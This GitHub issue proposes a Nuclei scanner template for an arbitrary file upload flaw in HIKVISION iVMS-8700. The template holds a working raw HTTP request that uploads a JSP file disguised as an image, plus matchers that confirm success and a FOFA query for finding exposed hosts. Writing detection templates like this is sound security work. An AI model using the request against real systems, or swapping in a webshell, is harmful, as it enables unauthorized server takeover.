### ISSUE TITLE
hikvision-ivms-file-upload

### ISSUE THREAD

**Issue by brucelsone** [projectdiscovery/nuclei-templates#7535]
### Template Information:
HIKVISION iVMS-8700 integrated security management platform has an arbitrary file upload vulnerability. Attackers can upload Webshell files to control the server by sending specific request packets.

### Nuclei Template:

```yaml
id: hikvision-ivms-file-upload

info: 
  name: HIKVISION iVMS-8700 integrated security management platform Arbitrary File Upload
  author: brucelsone
  severity: critical
  description: HIKVISION iVMS-8700 integrated security management platform has an arbitrary file upload vulnerability. Attackers can upload Webshell files to control the server by sending specific request packets.
  reference: 
    - https://www.wangan.com/p/11v754aceadb994f
  metadata:
    max-request: 2
    fofa-query: icon_hash="-911494769"
  tags: HIKVISION,ivms,fileupload

http:
  - raw: 
      - |
        POST /eps/resourceOperations/upload.action HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: MicroMessenger
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ISMS_8700_Sessionname=CA0F207A6372FE883ACA78B74E6DC953; CAS-USERNAME=058; ISMS_8700_Sessionname=4D808BE7BE0E5C7047B9688E6009F710
        Connection: close
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
        Content-Length: 212

        ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
        Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
        Content-Type: image/jpeg

        <%out.print("hello");%>
        ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "true"
          - "resourceUuid"
          - "test.jsp"
        condition: and

      - type: status
        status:
          - 200

```
